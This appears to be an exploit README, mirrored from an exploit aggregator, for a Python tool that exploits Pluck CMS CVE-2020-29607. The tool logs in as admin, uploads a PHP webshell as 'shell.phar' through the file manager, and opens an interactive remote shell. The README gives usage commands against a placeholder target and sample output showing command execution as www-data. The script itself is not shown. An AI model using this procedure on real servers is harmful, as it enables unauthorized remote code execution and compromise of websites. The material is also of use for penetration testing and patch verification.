Exploit for Unrestricted Upload of File with Dangerous Type in Pluck-Cms Pluck CVE-2020-29607

## https://sploitus.com/exploit?id=0FC9E8C6-E42F-52B6-A03F-37D1B617D7A2
# CVE-2020-29607 — Pluck CMS  Authenticated remote code execution in Pluck CMS before 4.7.13. The admin file manager (`admin.php?action=files`) does not validate file extensions, allowing upload of `.phar` files which Apache executes as PHP. Uploading a webshell through this endpoint results in RCE as the web server user.

---

## How it works

1. Authenticates using the provided admin password.
2. Uploads a PHP webshell as `shell.phar` via the admin file manager.
3. Verifies execution by requesting the shell and running `id`.
4. Opens an interactive command loop against the uploaded webshell.

## Requirements

- Python 3
- Install dependencies:

```bash
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
```

## Usage

```bash
# Pluck at root
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD

# Pluck in a subdirectory
python3 exploit.py -u http://TARGET -p ADMIN_PASSWORD --path /pluck
```

**Example:**

```
$ python3 exploit.py -u http://10.10.10.10 -p admin123
[*] Logging in...
[+] Logged in
[*] Uploading webshell...
[+] Webshell uploaded
[*] Shell URL: http://10.10.10.10/files/shell.phar
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data
```

## References

- [CVE-2020-29607](https://nvd.nist.gov/vuln/detail/CVE-2020-29607)
- [EDB-49909](https://www.exploit-db.com/exploits/49909)
- [Original PoC by Ron Jost (Hacker5preme)](https://github.com/Hacker5preme/Exploits)

## Credits

- **Discovery & original exploit:** Ron Jost (Hacker5preme)
- **Python 3 port & interactive shell:** [Esteban Zárate](https://github.com/estebanzarate)